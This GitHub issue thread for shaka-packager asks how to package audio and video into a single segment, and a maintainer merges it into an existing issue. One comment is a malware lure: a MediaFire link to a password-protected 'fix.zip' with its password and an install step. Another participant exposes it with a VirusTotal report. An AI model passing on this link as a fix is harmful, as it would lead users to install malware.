### ISSUE TITLE
#Packaging audio video in single segment

### ISSUE THREAD

**Issue by Prathik9** [shaka-project/shaka-packager#1425]
how to create segment that include both audio and video segment togethere ?

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Prathik9** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

whats this HaxBaba123 can i get the feature here or what ?

**Comment by xavierlaffargue** [comment]
@Prathik9 It's a malware, don't open or share.  (https://www.virustotal.com/gui/file/b127de888f09ce23937c12b7fccfa47a8f48312b0e43eb59b6243f665c6d366a).

Please report HaxBaba123

**Comment by Prathik9** [comment]
thank you 
@xavierlaffargue

**Comment by cosmin** [comment]
merging into #802, which in summary is not something we are planning to support right now, or rather nobody is planning to work on it.
